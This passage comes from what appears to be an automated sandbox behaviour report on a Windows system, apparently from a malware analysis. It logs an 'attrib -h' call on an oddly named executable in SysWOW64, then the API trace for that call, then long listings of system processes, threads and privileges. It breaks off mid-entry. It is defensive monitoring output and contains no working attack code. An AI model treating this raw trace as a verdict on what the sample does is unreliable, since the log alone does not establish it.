os_parent_pid = "0x930" cmd_line = "attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 390 os_tid = 0x72c [0094.731] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ffd14 | out: lpSystemTimeAsFileTime=0x1ffd14*(dwLowDateTime=0xda532370, dwHighDateTime=0x1d64ac6)) [0094.731] GetCurrentProcessId () returned 0x640 [0094.731] GetCurrentThreadId () returned 0x72c [0094.731] GetTickCount () returned 0x11512e5 [0094.731] QueryPerformanceCounter (in: lpPerformanceCount=0x1ffd0c | out: lpPerformanceCount=0x1ffd0c*=21538771770) returned 1 [0094.732] GetModuleHandleA (lpModuleName=0x0) returned 0xc30000 [0094.732] __set_app_type (_Type=0x1) [0094.732] __p__fmode () returned 0x770331f4 [0094.732] __p__commode () returned 0x770331fc [0094.732] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc329b9) returned 0x0 [0094.732] __getmainargs (in: _Argc=0xc3401c, _Argv=0xc34024, _Env=0xc34020, _DoWildCard=0, _StartInfo=0xc34030 | out: _Argc=0xc3401c, _Argv=0xc34024, _Env=0xc34020) returned 0 [0094.732] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.732] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x4) returned 0x5b1cf8 [0094.732] ??0CLASS_DESCRIPTOR@@QAE@XZ () returned 0x5b1cf8 [0094.732] ?Initialize@CLASS_DESCRIPTOR@@QAEEXZ () returned 0x5b1c01 [0094.733] ??0PROGRAM@@IAE@XZ () returned 0x1ff568 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff5f0 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff620 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff650 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff680 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff6b0 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff6e0 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff710 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff740 [0094.733] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff770 [0094.734] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff7a0 [0094.734] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff7d0 [0094.734] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff800 [0094.734] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff830 [0094.734] ??0FLAG_ARGUMENT@@QAE@XZ () returned 0x1ff860 [0094.734] ??0PATH_ARGUMENT@@QAE@XZ () returned 0x1ff890 [0094.734] ??0FSN_FILTER@@QAE@XZ () returned 0x1ff8c4 [0094.734] ??0FSN_FILTER@@QAE@XZ () returned 0x1ff964 [0094.734] ??0STREAM_MESSAGE@@QAE@XZ () returned 0x1ffa08 [0094.734] ??0PATH@@QAE@XZ () returned 0x1ffa70 [0094.734] ??0DSTRING@@QAE@XZ () returned 0x1ffcbc [0094.734] ??0ARGUMENT_LEXEMIZER@@QAE@XZ () returned 0x1feeb0 [0094.734] ??0ARRAY@@QAE@XZ () returned 0x1ff078 [0094.734] ??0ARRAY@@QAE@XZ () returned 0x1ff0c0 [0094.734] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x1fefac [0094.734] ??0PATH@@QAE@XZ () returned 0x1ff31c [0094.734] ??0DSTRING@@QAE@XZ () returned 0x1ff090 [0094.734] ??0PATH@@QAE@XZ () returned 0x1ff0dc [0094.734] ??0DSTRING@@QAE@XZ () returned 0x1ff060 [0094.734] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x1ff004 [0094.734] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x1ff030 [0094.734] ??0STRING_ARGUMENT@@QAE@XZ () returned 0x1fefd8 [0094.734] ??0DSTRING@@QAE@XZ () returned 0x1ff0a8 [0094.734] ?Get_Standard_Output_Stream@@YGPAVSTREAM@@XZ () returned 0x5b1fb0 [0094.734] ?Get_Standard_Input_Stream@@YGPAVSTREAM@@XZ () returned 0x5b1e50 [0094.734] ?Initialize@STREAM_MESSAGE@@QAEEPAVSTREAM@@00@Z () returned 0x1 [0094.735] ?Initialize@WSTRING@@QAEEPBGK@Z () returned 0x5b1d01 [0094.735] ?Initialize@ARRAY@@QAEEKK@Z () returned 0x1 [0094.735] ?Initialize@ARGUMENT_LEXEMIZER@@QAEEPAVARRAY@@@Z () returned 0x5b1d01 [0094.735] ?PutSwitches@ARGUMENT_LEXEMIZER@@QAEXPBD@Z () returned 0x5b1d01 [0094.735] ?SetCaseSensitive@ARGUMENT_LEXEMIZER@@QAEXE@Z () returned 0x5b1d00 [0094.735] ?Initialize@WSTRING@@QAEEPBDK@Z () returned 0x5b1d01 [0094.735] ?Initialize@WSTRING@@QAEEPBDK@Z () returned 0x5b1d01 [0094.735] ?PutSeparators@ARGUMENT_LEXEMIZER@@QAEXPBD@Z () returned 0x5b1d01 [0094.735] ?PrepareToParse@ARGUMENT_LEXEMIZER@@QAEEPAVWSTRING@@@Z () returned 0xffffff01 [0094.735] ?Initialize@ARRAY@@QAEEKK@Z () returned 0x1 [0094.735] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x5b1d01 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b1d01 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b1d01 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b1d01 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b1e01 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b1e01 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b1e01 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b1e01 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3101 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3101 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3101 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3101 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3201 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3201 [0094.735] ?Initialize@FLAG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3201 [0094.735] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3201 [0094.735] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3201 [0094.735] ?Initialize@LONG_ARGUMENT@@QAEEPAD@Z () returned 0x5b3201 [0094.735] ?Initialize@PATH_ARGUMENT@@QAEEPADE@Z () returned 0x5b3201 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.735] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?Put@ARRAY@@UAEEPAVOBJECT@@@Z () returned 0x5b3001 [0094.736] ?DoParsing@ARGUMENT_LEXEMIZER@@QAEEPAVARRAY@@@Z () returned 0x1 [0094.736] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0094.736] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0094.736] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x0 [0094.736] ?IsValueSet@ARGUMENT@@QAEEXZ () returned 0x1 [0094.736] ?Initialize@PATH@@QAEEPBVWSTRING@@E@Z () returned 0x1ffc01 [0094.736] ?QueryString@WSTRING@@QBEPAV1@KK@Z () returned 0x5b35c8 [0094.736] ?Initialize@PATH@@QAEEPBVWSTRING@@E@Z () returned 0x1ff501 [0094.736] ?IsDrive@PATH@@QBEEXZ () returned 0x0 [0094.736] ?QueryDirectory@SYSTEM@@SGPAVFSN_DIRECTORY@@PBVPATH@@E@Z () returned 0x5b3b80 [0094.737] ?Initialize@FSN_FILTER@@QAEEXZ () returned 0x1 [0094.737] ?SetFileName@FSN_FILTER@@QAEEPBD@Z () returned 0x5b1d01 [0094.737] ?SetAttributes@FSN_FILTER@@QAEEKKK@Z () returned 0x1 [0094.737] ?QueryString@WSTRING@@QBEPAV1@KK@Z () returned 0x5b35c8 [0094.737] ?Initialize@FSN_FILTER@@QAEEXZ () returned 0x1 [0094.737] ?SetFileName@FSN_FILTER@@QAEEPBVWSTRING@@@Z () returned 0x5b3601 [0094.737] ?SetAttributes@FSN_FILTER@@QAEEKKK@Z () returned 0x1 [0094.737] ?DeleteAllMembers@ARRAY@@UAEEXZ () returned 0x5b2e01 [0094.737] ??1DSTRING@@UAE@XZ () returned 0x0 [0094.737] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x240001 [0094.737] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x140001 [0094.737] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x120001 [0094.737] ??1DSTRING@@UAE@XZ () returned 0x0 [0094.737] ??1PATH@@UAE@XZ () returned 0x0 [0094.737] ??1DSTRING@@UAE@XZ () returned 0x0 [0094.737] ??1PATH@@UAE@XZ () returned 0x0 [0094.737] ??1STRING_ARGUMENT@@UAE@XZ () returned 0x680001 [0094.737] ??1ARRAY@@UAE@XZ () returned 0x1 [0094.737] ??1ARRAY@@UAE@XZ () returned 0x1 [0094.737] ??1ARGUMENT_LEXEMIZER@@UAE@XZ () returned 0x5c0001 [0094.737] ?QueryFsnodeArray@FSN_DIRECTORY@@QBEPAVARRAY@@PAVFSN_FILTER@@@Z () returned 0x5b4040 [0094.738] ?QueryIterator@ARRAY@@UBEPAVITERATOR@@XZ () returned 0x5aecb8 [0094.738] ?SetAttributes@FSNODE@@QAEEKPAK@Z () returned 0x1 [0094.738] ??1DSTRING@@UAE@XZ () returned 0x5e0001 [0094.738] ??1PATH@@UAE@XZ () returned 0x5e0001 [0094.738] ??1STREAM_MESSAGE@@UAE@XZ () returned 0x0 [0094.738] ??1FSN_FILTER@@UAE@XZ () returned 0x1 [0094.738] ??1FSN_FILTER@@UAE@XZ () returned 0x5a0001 [0094.738] ??1PATH_ARGUMENT@@UAE@XZ () returned 0x100001 [0094.738] ??1DSTRING@@UAE@XZ () returned 0x160001 [0094.738] ??1OBJECT@@UAE@XZ () returned 0x160001 [0094.738] ??1DSTRING@@UAE@XZ () returned 0xc0001 [0094.738] ??1OBJECT@@UAE@XZ () returned 0xc0001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0xe0001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0xe0001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0xa0001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0xa0001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x80001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x80001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x40001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x40001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x560001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x560001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x60001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x60001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x7c0001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x7c0001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x780001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x780001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x7a0001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x7a0001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x740001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x740001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x760001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x760001 [0094.739] ??1DSTRING@@UAE@XZ () returned 0x700001 [0094.739] ??1OBJECT@@UAE@XZ () returned 0x700001 [0094.739] ??1PROGRAM@@UAE@XZ () returned 0x0 [0094.739] exit (_Code=0) Process: id = "34" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x1eef000" os_pid = "0x330" os_integrity_level = "0x4000" os_privileges = "0x860b14080" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x178" cmd_line = "\"LogonUI.exe\" /flags:0x1" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 412 os_tid = 0x7ac Thread: id = 413 os_tid = 0x9b0 Thread: id = 414 os_tid = 0x80c Thread: id = 415 os_tid = 0xb70 Thread: id = 416 os_tid = 0x81c Thread: id = 417 os_tid = 0x86c Thread: id = 418 os_tid = 0xb6c Thread: id = 419 os_tid = 0xa8c Thread: id = 420 os_tid = 0x5a8 Process: id = "35" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 440 os_tid = 0x8 Thread: id = 441 os_tid = 0x9c Thread: id = 442 os_tid = 0x78 Thread: id = 443 os_tid = 0xc0 Thread: id = 444 os_tid = 0x24 Thread: id = 445 os_tid = 0x34 Thread: id = 446 os_tid = 0x3c Thread: id = 447 os_tid = 0x38 Thread: id = 448 os_tid = 0x4c Thread: id = 449 os_tid = 0x40 Thread: id = 450 os_tid = 0xc4 Thread: id = 451 os_tid = 0xcc Thread: id = 452 os_tid = 0xd0 Thread: id = 453 os_tid = 0xb8 Thread: id = 454 os_tid = 0xd4 Thread: id = 455 os_tid = 0xd8 Thread: id = 456 os_tid = 0xdc Thread: id = 458 os_tid = 0x5c Thread: id = 459 os_tid = 0x30 Thread: id = 462 os_tid = 0x44 Thread: id = 463 os_tid = 0x48 Thread: id = 464 os_tid = 0x2c Thread: id = 465 os_tid = 0xf8 Thread: id = 466 os_tid = 0xfc Thread: id = 467 os_tid = 0x100 Thread: id = 468 os_tid = 0x108 Thread: id = 469 os_tid = 0x28 Thread: id = 470 os_tid = 0x110 Thread: id = 471 os_tid = 0x10c Thread: id = 472 os_tid = 0x84 Thread: id = 473 os_tid = 0x80 Thread: id = 474 os_tid = 0x8c Thread: id = 475 os_tid = 0x104 Thread: id = 476 os_tid = 0x64 Thread: id = 477 os_tid = 0xb4 Thread: id = 478 os_tid = 0x90 Thread: id = 479 os_tid = 0xa8 Thread: id = 483 os_tid = 0x12c Thread: id = 484 os_tid = 0x130 Thread: id = 485 os_tid = 0x134 Thread: id = 486 os_tid = 0x138 Thread: id = 506 os_tid = 0x18c Thread: id = 518 os_tid = 0x68 Thread: id = 525 os_tid = 0x88 Thread: id = 532 os_tid = 0x114 Thread: id = 533 os_tid = 0x98 Thread: id = 555 os_tid = 0x60 Thread: id = 556 os_tid = 0x74 Thread: id = 561 os_tid = 0x26c Thread: id = 570 os_tid = 0xbc Thread: id = 585 os_tid = 0x2d0 Thread: id = 596 os_tid = 0x2f8 Thread: id = 598 os_tid = 0x2fc Thread: id = 613 os_tid = 0x1c Thread: id = 619 os_tid = 0x20 Thread: id = 636 os_tid = 0x50 Thread: id = 643 os_tid = 0x3bc Thread: id = 654 os_tid = 0x3f4 Thread: id = 664 os_tid = 0x110 Thread: id = 683 os_tid = 0x290 Thread: id = 685 os_tid = 0x33c Thread: id = 699 os_tid = 0xa0 Thread: id = 726 os_tid = 0x94 Thread: id = 743 os_tid = 0x4b8 Thread: id = 761 os_tid = 0x4c0 Thread: id = 762 os_tid = 0x4bc Thread: id = 764 os_tid = 0x51c Process: id = "36" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2cccb000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 457 os_tid = 0xe4 Thread: id = 460 os_tid = 0xe8 Thread: id = 480 os_tid = 0x118 Thread: id = 491 os_tid = 0x15c Process: id = "37" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2cae6000" os_pid = "0xec" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 461 os_tid = 0xf0 Process: id = "38" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2cc36000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 481 os_tid = 0x120 Process: id = "39" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c48e000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x11c" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 482 os_tid = 0x128 Thread: id = 487 os_tid = 0x13c Thread: id = 488 os_tid = 0x140 Thread: id = 489 os_tid = 0x144 Thread: id = 490 os_tid = 0x148 Thread: id = 499 os_tid = 0x180 Thread: id = 507 os_tid = 0x19c Thread: id = 508 os_tid = 0x1a0 Thread: id = 515 os_tid = 0x1d0 Thread: id = 774 os_tid = 0x558 Process: id = "40" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2803d000" os_pid = "0x14c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 492 os_tid = 0x150 Process: id = "41" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x27994000" os_pid = "0x154" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x11c" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 493 os_tid = 0x158 Thread: id = 501 os_tid = 0x184 Thread: id = 502 os_tid = 0x188 Thread: id = 510 os_tid = 0x1a8 Thread: id = 511 os_tid = 0x1ac Thread: id = 513 os_tid = 0x1cc Thread: id = 522 os_tid = 0x1e4 Thread: id = 523 os_tid = 0x1e8 Process: id = "42" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x27e1e000" os_pid = "0x160" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x14c" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 494 os_tid = 0x164 Thread: id = 495 os_tid = 0x168 Thread: id = 496 os_tid = 0x16c Thread: id = 497 os_tid = 0x170 Thread: id = 498 os_tid = 0x174 Thread: id = 503 os_tid = 0x190 Thread: id = 509 os_tid = 0x1a4 Thread: id = 512 os_tid = 0x1b0 Thread: id = 754 os_tid = 0x504 Process: id = "43" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x27a24000" os_pid = "0x178" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x14c" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 500 os_tid = 0x17c Thread: id = 504 os_tid = 0x194 Thread: id = 505 os_tid = 0x198 Thread: id = 579 os_tid = 0x2bc Thread: id = 597 os_tid = 0x308 Thread: id = 658 os_tid = 0xc8 Thread: id = 659 os_tid = 0xf0 Thread: id = 666 os_tid = 0x108 Process: id = "44" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x26398000" os_pid = "0x1b4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0x154" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 514 os_tid = 0x1b8 Thread: id = 534 os_tid = 0x204 Thread: id = 535 os_tid = 0x208 Thread: id = 536 os_tid = 0x20c Thread: id = 537 os_tid = 0x210 Thread: id = 538 os_tid = 0x214 Thread: id = 539 os_tid = 0x218 Thread: id = 540 os_tid = 0x21c Thread: id = 541 os_tid = 0x220 Thread: id = 542 os_tid = 0x224 Thread: id = 543 os_tid = 0x228 Thread: id = 544 os_tid = 0x22c Thread: id = 560 os_tid = 0x268 Thread: id = 660 os_tid = 0xcc Thread: id = 750 os_tid = 0x4e0 Thread: id = 773 os_tid = 0x54c Process: id = "45" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x25e9e000" os_pid = "0x1bc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0x154" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 516 os_tid = 0x1c0 Thread: id = 519 os_tid = 0x1d4 Thread: id = 520 os_tid = 0x1d8 Thread: id = 521 os_tid = 0x1dc Thread: id = 524 os_tid = 0x1e0 Thread: id = 526 os_tid = 0x1ec Thread: id = 527 os_tid = 0x1f0 Thread: id = 528 os_tid = 0x1f4 Thread: id = 529 os_tid = 0x1f8 Thread: id = 530 os_tid = 0x1fc Thread: id = 531 os_tid = 0x200 Thread: id = 665 os_tid = 0x10c Thread: id = 689 os_tid = 0x3b0 Process: id = "46" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0x25dbb000" os_pid = "0x1c4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0x154" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 517 os_tid = 0x1c8 Thread: id = 546 os_tid = 0x238 Thread: id = 576 os_tid = 0x2ac Thread: id = 577 os_tid = 0x2b0 Thread: id = 580 os_tid = 0x2b8 Thread: id = 581 os_tid = 0x2c0 Thread: id = 582 os_tid = 0x2c4 Thread: id = 583 os_tid = 0x2c8 Thread: id = 584 os_tid = 0x2cc Thread: id = 587 os_tid = 0x2d8 Thread: id = 745 os_tid = 0x4cc Process: id = "47" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24ff9000" os_pid = "0x230" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:000070e3" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 545 os_tid = 0x234 Thread: id = 547 os_tid = 0x23c Thread: id = 548 os_tid = 0x240 Thread: id = 549 os_tid = 0x244 Thread: id = 550 os_tid = 0x248 Thread: id = 551 os_tid = 0x24c Thread: id = 552 os_tid = 0x250 Thread: id = 553 os_tid = 0x254 Thread: id = 554 os_tid = 0x258 Thread: id = 557 os_tid = 0x25c Thread: id = 558 os_tid = 0x260 Thread: id = 559 os_tid = 0x264 Thread: id = 562 os_tid = 0x270 Thread: id = 563 os_tid = 0x274 Thread: id = 565 os_tid = 0x280 Thread: id = 566 os_tid = 0x284 Thread: id = 627 os_tid = 0x37c Process: id = "48" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2542e000" os_pid = "0x278" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x1b4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT 